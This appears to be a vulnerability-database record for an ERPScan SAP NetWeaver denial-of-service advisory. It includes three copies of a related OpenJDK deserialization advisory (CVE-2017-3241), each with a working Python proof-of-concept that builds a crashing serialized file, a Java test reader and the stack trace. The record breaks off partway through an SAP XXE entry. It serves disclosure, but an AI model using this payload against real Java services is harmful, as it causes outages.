ID ERPSCAN-10-006 Type erpscan Reporter ERPScan Modified 2010-02-15T00:00:00
Application: SAP NetWeaver
Versions Affected: SAP NetWeaver 7.0 metamodel repository
Vendor URL: <http://sap.com>
Bugs: Denial of service
Exploits: YES
Reported: 15.02.2010
Vendor response: 15.02.2010
Date of Public Advisory: 09.11.2010
Author: Alexandr Polyakov
Description
The SAP NetWeaver Metamodel Repository (MMR) can be accessed without authentication by default in older versions of SAP ECC.
Business Risk
A remote attacker can send a malicious packet to the SAP NetWeaver server, either over the Internet or from inside the company network, and conduct a denial of service attack through resource exhaustion. This stops the server and all business processes running on it, which can lead to monetary and reputational loss.
{"type": "erpscan", "published": "2010-02-15T00:00:00", "href": "https://erpscan.io/advisories/erpscan-10-006-sap-netweaver-mmr-denail-of-service/", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:7756C14129260F0F8D9820A2A1AD8A02"]}, {"type": "exploitdb", "idList": ["EDB-ID:41145"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140680"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32257"]}], "modified": "2020-09-15T10:41:39", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2020-09-15T10:41:39", "rev": 2}, "vulnersScore": 3.7}, "lastseen": "2020-09-15T10:41:39", "viewCount": 2, "id": "ERPSCAN-10-006", "references": [], "edition": 4, "reporter": "ERPScan", "modified": "2010-02-15T00:00:00", "title": "SAP NetWeaver MMR \u2014 Denial of Service", "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP NetWeaver 7.0 metamodel repository \n**Vendor URL:** <http://sap.com> \n**Bugs:** Denial of service \n**Exploits:** YES \n**Reported:** 15.02.2010 \n**Vendor response:** 15.02.2010 \n**Date of Public Advisory:** 09.11.2010 \n**Author:** Alexandr Polyakov\n\n**Description** \nSAP Netweaver Metamodel Repository can be accessed without authentication by default in the old versions of SAP ECC.\n\n**Business Risk** \nA remote attacker can send a malicious packet to SAP NetWeaver server via the Internet or inside a company and conduct a denial of service attack by resource exhaustion. This will stop server and all business processes running on it. It can lead to monetary and reputation loss.\n", "scheme": null}
{"packetstorm": [{"lastseen": "2017-01-23T19:04:23", "description": "", "published": "2017-01-23T00:00:00", "type": "packetstorm", "title": "Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "PACKETSTORM:140680", "href": "https://packetstormsecurity.com/files/140680/Oracle-OpenJDK-Runtime-Environment-Build-1.8.0_112-b15-Denial-Of-Service.html", "sourceData": "`Application: Java SE \n \nVendor: Oracle \n \nBug: DoS \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \nReference: Oracle CPU Jan 2017 \n \nAuthor: Roman Shalymov \n \n \n \n1. ADVISORY INFORMATION \n \nTitle: Oracle OpenJDK - Java Serialization DoS \n \nAdvisory ID: [ERPSCAN-17-006] \n \nRisk: High \n \nAdvisory URL: \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \nDate published: 17.01.2017 \n \nVendor contacted: Oracle \n \n \n2. VULNERABILITY INFORMATION \n \n \nClass: Denial of Service \n \nRemotely Exploitable: Yes \n \nLocally Exploitable: Yes \n \nCVE Name: CVE-2017-3241 \n \nCVSS Base Score: 9.0 \n \n \n3. VULNERABILITY DESCRIPTION \n \n \nAn attacker can cause DoS of the application which uses OpenJDK Runtime \nEnvironment 1.8 as its core runtime engine. \n \n \n4. VULNERABLE PACKAGES \n \n \nOpenJDK Runtime Environment build 1.8.0_112-b15 \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \n \nFix ObjectInputStream.skipCustomData() method, namely readObject0(false); \ncall in switch statement \n \nAdress Oracle CPU January 2017 \n \n6. AUTHOR \n \n \nRoman Shalymov (@shalymov) \n \n \n7. TECHNICAL DESCRIPTION \n \n \nAn attacker can craft a malicious sequence of bytes that will cause JVM \nStackOverflowError in the standard Java deserialization process if it uses \nObjectInputStream.readObject() method. \n \n \n \n7.1. 
Proof of Concept \n \n \n \nAn attacker creates a malicious sequence of bytes, for example, using this \npython script pwn_ser.py: \n \n \n \n#!/usr/bin/env python2 \n \n \n \nimport sys \n \n \n \nexp = \"\" \n \n#serialization header \n \nexp += '\\xac\\xed\\x00\\x05' \n \n \n \nexp1 = '' \n \nexp1 += '\\x72' \n \nexp1 += '\\x00\\x0c'+'java.io.File' \n \nexp1 += '\\x41'*8 \n \nexp1 += '\\x00' \n \nexp1 += '\\x00\\x00' \n \n \n \nexp += exp1 * 10000 \n \n \n \nsys.stdout.write(exp) \n \n \n \nand save it in exp2.ser file \n \n \n \n$ ./pwn_ser2.py > exp2.ser \n \n \n \nLet's simulate deserialization process. For this purpose, we create a \nsimple Java program, which uses the following standard deserialization \npattern: \n \n \n \nSerialize_read.java \n \n \n \nimport java.io.FileInputStream; \n \nimport java.io.ObjectInputStream; \n \n \n \npublic class Serialize_read { \n \n \n \npublic static void main(String args[]) throws Exception { \n \n \n \nif(args.length < 1) { \n \nSystem.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\" \n[file]\"); \n \nSystem.exit(-1); \n \n} \n \n \n \nFileInputStream fin = new FileInputStream(args[0]); \n \nObjectInputStream oin = new ObjectInputStream(fin); \n \n \n \ntry { \n \nObject objFromDisk = oin.readObject(); \n \nString s = (String)objFromDisk; \n \nSystem.out.println(s); \n \nSystem.out.println(\"Successfully read!\"); \n \n}catch(Exception e){} \n \nSystem.exit(0); \n \n \n \n} \n \n \n \n} \n \n \n \nLet's try to read our malicious file (we can also simulate this stuff over \nnetwork communication): \n \n \n \n$ javac Serialize_read.java \n \n$ java Serialize_read exp2.ser \n \n \n \nIt causes the following error dump: \n \n \n \nException in thread \"main\" java.lang.StackOverflowError \n \nat \njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351) \n \nat \njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834) \n \nat 
\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892) \n \nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075) \n \nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684) \n \nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \n \n \n... \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \n \n \n8. REPORT TIMELINE \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \n9. 
REFERENCES \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \n \n10. ABOUT ERPScan Research \n \nERPScan research team specializes in vulnerability research and analysis of \ncritical enterprise applications. It was acknowledged multiple times by the \nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for \ndiscovering more than 400 vulnerabilities in their solutions (200 of them \njust in SAP!). \n \nERPScan researchers are proud of discovering new types of vulnerabilities \n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\" \nnomination at BlackHat 2013. \n \nERPScan experts participated as speakers, presenters, and trainers at 60+ \nprime international security conferences in 25+ countries across the \ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for \nseveral Fortune 2000 companies. \n \nERPScan researchers carry out the EAS-SEC project that is focused on \nenterprise application security awareness by issuing annual SAP security \nresearches. \n \nERPScan experts were interviewed in specialized info-sec resources and \nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC \nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. \n \nOur team consists of highly-qualified researchers, specialized in various \nfields of cybersecurity (from web application to ICS/SCADA systems), \ngathering their experience to conduct the best SAP security research. \n \n11. ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nCybersecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial, Retail and other organizations to \nsecure their mission-critical processes. 
Named as an aEmerging Vendora in \nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in \ndiscovering and resolving security vulnerabilities. ERPScan consultants \nwork with SAP SE in Walldorf to assist in improving the security of their \nlatest solutions. \n \nERPScanas primary mission is to close the gap between technical and \nbusiness security, and provide solutions for CISO's to evaluate and secure \nSAP and Oracle ERP systems and business-critical applications from both \ncyberattacks and internal fraud. As a rule, our clients are large \nenterprises, Fortune 2000 companies and MSPs, whose requirements are to \nactively monitor and manage security of vast SAP and Oracle landscapes on a \nglobal scale. \n \nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam, \nto provide threat intelligence services, continuous support and to operate \nlocal offices and partner network spanning 20+ countries around the globe. \n \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140680/ERPSCAN-17-006.txt"}], "exploitdb": [{"lastseen": "2017-01-23T20:59:34", "description": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service. CVE-2017-3241. 
Dos exploit for Multiple platform", "published": "2017-01-23T00:00:00", "type": "exploitdb", "title": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "EDB-ID:41145", "href": "https://www.exploit-db.com/exploits/41145/", "sourceData": "'''\r\nApplication: Java SE\r\n\r\nVendor: Oracle\r\n\r\nBug: DoS\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\nReference: Oracle CPU Jan 2017\r\n\r\nAuthor: Roman Shalymov\r\n\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle OpenJDK - Java Serialization DoS\r\n\r\nAdvisory ID: [ERPSCAN-17-006]\r\n\r\nRisk: High\r\n\r\nAdvisory URL:\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\nDate published: 17.01.2017\r\n\r\nVendor contacted: Oracle\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\n\r\nClass: Denial of Service\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nCVE Name: CVE-2017-3241\r\n\r\nCVSS Base Score: 9.0\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n\r\nAn attacker can cause DoS of the application which uses OpenJDK Runtime\r\nEnvironment 1.8 as its core runtime engine.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\n\r\nOpenJDK Runtime Environment build 1.8.0_112-b15\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\n\r\nFix ObjectInputStream.skipCustomData() method, namely readObject0(false);\r\ncall in switch statement\r\n\r\nAdress Oracle CPU January 2017\r\n\r\n 6. AUTHOR\r\n\r\n\r\nRoman Shalymov (@shalymov)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\n\r\nAn attacker can craft a malicious sequence of bytes that will cause JVM\r\nStackOverflowError in the standard Java deserialization process if it uses\r\nObjectInputStream.readObject() method.\r\n\r\n\r\n7.1. 
Proof of Concept\r\n\r\nAn attacker creates a malicious sequence of bytes, for example, using this\r\npython script pwn_ser.py:\r\n\r\n'''\r\n#!/usr/bin/env python2\r\n\r\nimport sys\r\n\r\nexp = \"\"\r\n\r\n#serialization header\r\n\r\nexp += '\\xac\\xed\\x00\\x05'\r\n\r\nexp1 = ''\r\n\r\nexp1 += '\\x72'\r\n\r\nexp1 += '\\x00\\x0c'+'java.io.File'\r\n\r\nexp1 += '\\x41'*8\r\n\r\nexp1 += '\\x00'\r\n\r\nexp1 += '\\x00\\x00'\r\n\r\n\r\nexp += exp1 * 10000\r\n\r\nsys.stdout.write(exp)\r\n\r\n'''\r\nand save it in exp2.ser file\r\n\r\n\r\n$ ./pwn_ser2.py > exp2.ser\r\n\r\nLet's simulate deserialization process. For this purpose, we create a\r\nsimple Java program, which uses the following standard deserialization\r\npattern:\r\n\r\n\r\nSerialize_read.java\r\n\r\n\r\nimport java.io.FileInputStream;\r\n\r\nimport java.io.ObjectInputStream;\r\n\r\npublic class Serialize_read {\r\n\r\npublic static void main(String args[]) throws Exception {\r\n\r\n if(args.length < 1) {\r\n\r\n System.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\"\r\n[file]\");\r\n\r\n System.exit(-1);\r\n\r\n }\r\n\r\n FileInputStream fin = new FileInputStream(args[0]);\r\n\r\n ObjectInputStream oin = new ObjectInputStream(fin);\r\n\r\n try {\r\n\r\n Object objFromDisk = oin.readObject();\r\n\r\n String s = (String)objFromDisk;\r\n\r\n System.out.println(s);\r\n\r\n System.out.println(\"Successfully read!\");\r\n\r\n }catch(Exception e){}\r\n\r\n System.exit(0);\r\n\r\n}\r\n\r\n}\r\n\r\n\r\nLet's try to read our malicious file (we can also simulate this stuff over\r\nnetwork communication):\r\n\r\n$ javac Serialize_read.java\r\n\r\n$ java Serialize_read exp2.ser\r\n\r\nIt causes the following error dump:\r\n\r\nException in thread \"main\" 
java.lang.StackOverflowError\r\n\r\nat\r\njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)\r\n\r\nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)\r\n\r\nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)\r\n\r\nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\n...\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat 
java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and analysis of\r\ncritical enterprise applications. It was acknowledged multiple times by the\r\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\r\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\r\njust in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of vulnerabilities\r\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\r\nnomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\r\nseveral Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP security\r\nresearches.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\r\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in various\r\nfields of cybersecurity (from web application to ICS/SCADA systems),\r\ngathering their experience to conduct the best SAP security research.\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. 
Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial, Retail and other organizations to\r\nsecure their mission-critical processes. Named as an aEmerging Vendora in\r\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan consultants\r\nwork with SAP SE in Walldorf to assist in improving the security of their\r\nlatest solutions.\r\n\r\nERPScanas primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISO's to evaluate and secure\r\nSAP and Oracle ERP systems and business-critical applications from both\r\ncyberattacks and internal fraud. As a rule, our clients are large\r\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\r\nactively monitor and manage security of vast SAP and Oracle landscapes on a\r\nglobal scale.\r\n\r\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\r\nto provide threat intelligence services, continuous support and to operate\r\nlocal offices and partner network spanning 20+ countries around the globe.\r\n\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41145/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "edition": 1, "published": "2017-01-23T00:00:00", "title": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "EXPLOITPACK:7756C14129260F0F8D9820A2A1AD8A02", "href": "", "sourceData": "'''\nApplication: Java SE\n\nVendor: Oracle\n\nBug: DoS\n\nReported: 23.12.2016\n\nVendor response: 24.12.2016\n\nDate of Public Advisory: 17.01.2017\n\nReference: Oracle CPU Jan 2017\n\nAuthor: Roman Shalymov\n\n\n\n1. ADVISORY INFORMATION\n\nTitle: Oracle OpenJDK - Java Serialization DoS\n\nAdvisory ID: [ERPSCAN-17-006]\n\nRisk: High\n\nAdvisory URL:\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\n\nDate published: 17.01.2017\n\nVendor contacted: Oracle\n\n\n2. VULNERABILITY INFORMATION\n\n\nClass: Denial of Service\n\nRemotely Exploitable: Yes\n\nLocally Exploitable: Yes\n\nCVE Name: CVE-2017-3241\n\nCVSS Base Score: 9.0\n\n\n3. VULNERABILITY DESCRIPTION\n\n\nAn attacker can cause DoS of the application which uses OpenJDK Runtime\nEnvironment 1.8 as its core runtime engine.\n\n\n4. VULNERABLE PACKAGES\n\n\nOpenJDK Runtime Environment build 1.8.0_112-b15\n\n\n5. SOLUTIONS AND WORKAROUNDS\n\n\nFix ObjectInputStream.skipCustomData() method, namely readObject0(false);\ncall in switch statement\n\nAdress Oracle CPU January 2017\n\n 6. AUTHOR\n\n\nRoman Shalymov (@shalymov)\n\n\n7. 
TECHNICAL DESCRIPTION\n\n\nAn attacker can craft a malicious sequence of bytes that will cause JVM\nStackOverflowError in the standard Java deserialization process if it uses\nObjectInputStream.readObject() method.\n\n\n7.1. Proof of Concept\n\nAn attacker creates a malicious sequence of bytes, for example, using this\npython script pwn_ser.py:\n\n'''\n#!/usr/bin/env python2\n\nimport sys\n\nexp = \"\"\n\n#serialization header\n\nexp += '\\xac\\xed\\x00\\x05'\n\nexp1 = ''\n\nexp1 += '\\x72'\n\nexp1 += '\\x00\\x0c'+'java.io.File'\n\nexp1 += '\\x41'*8\n\nexp1 += '\\x00'\n\nexp1 += '\\x00\\x00'\n\n\nexp += exp1 * 10000\n\nsys.stdout.write(exp)\n\n'''\nand save it in exp2.ser file\n\n\n$ ./pwn_ser2.py > exp2.ser\n\nLet's simulate deserialization process. For this purpose, we create a\nsimple Java program, which uses the following standard deserialization\npattern:\n\n\nSerialize_read.java\n\n\nimport java.io.FileInputStream;\n\nimport java.io.ObjectInputStream;\n\npublic class Serialize_read {\n\npublic static void main(String args[]) throws Exception {\n\n if(args.length < 1) {\n\n System.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\"\n[file]\");\n\n System.exit(-1);\n\n }\n\n FileInputStream fin = new FileInputStream(args[0]);\n\n ObjectInputStream oin = new ObjectInputStream(fin);\n\n try {\n\n Object objFromDisk = oin.readObject();\n\n String s = (String)objFromDisk;\n\n System.out.println(s);\n\n System.out.println(\"Successfully read!\");\n\n }catch(Exception e){}\n\n System.exit(0);\n\n}\n\n}\n\n\nLet's try to read our malicious file (we can also simulate this stuff over\nnetwork communication):\n\n$ javac Serialize_read.java\n\n$ java Serialize_read exp2.ser\n\nIt causes the following error dump:\n\nException in thread \"main\" 
java.lang.StackOverflowError\n\nat\njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)\n\nat\njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)\n\nat\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)\n\nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)\n\nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)\n\nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\n...\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\n\n8. 
REPORT TIMELINE\n\nReported: 23.12.2016\n\nVendor response: 24.12.2016\n\nDate of Public Advisory: 17.01.2017\n\n9. REFERENCES\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\n\n\n10. ABOUT ERPScan Research\n\nERPScan research team specializes in vulnerability research and analysis of\ncritical enterprise applications. It was acknowledged multiple times by the\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\njust in SAP!).\n\nERPScan researchers are proud of discovering new types of vulnerabilities\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\nnomination at BlackHat 2013.\n\nERPScan experts participated as speakers, presenters, and trainers at 60+\nprime international security conferences in 25+ countries across the\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\nseveral Fortune 2000 companies.\n\nERPScan researchers carry out the EAS-SEC project that is focused on\nenterprise application security awareness by issuing annual SAP security\nresearches.\n\nERPScan experts were interviewed in specialized info-sec resources and\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.\n\nOur team consists of highly-qualified researchers, specialized in various\nfields of cybersecurity (from web application to ICS/SCADA systems),\ngathering their experience to conduct the best SAP security research.\n\n11. ABOUT ERPScan\n\nERPScan is the most respected and credible Business Application\nCybersecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial, Retail and other organizations to\nsecure their mission-critical processes. 
Named as an aEmerging Vendora in\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\ndiscovering and resolving security vulnerabilities. ERPScan consultants\nwork with SAP SE in Walldorf to assist in improving the security of their\nlatest solutions.\n\nERPScanas primary mission is to close the gap between technical and\nbusiness security, and provide solutions for CISO's to evaluate and secure\nSAP and Oracle ERP systems and business-critical applications from both\ncyberattacks and internal fraud. As a rule, our clients are large\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\nactively monitor and manage security of vast SAP and Oracle landscapes on a\nglobal scale.\n\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\nto provide threat intelligence services, continuous support and to operate\nlocal offices and partner network spanning 20+ countries around the globe.\n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nPhone: 650.798.5255\n\nTwitter: @erpscan\n\nScoop-it: Business Application Security\n'''", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2811"], "description": "\r\nERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE\r\n\r\n\r\nApplication: SAP NetWeaver Portal 7.31\r\nVersions Affected: SAP NetWeaver Portal 7.31, probably others\r\nVendor URL: http://SAP.com\r\nBugs: XXE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\nReference: SAP Security Note 2111939\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n\r\n1. 
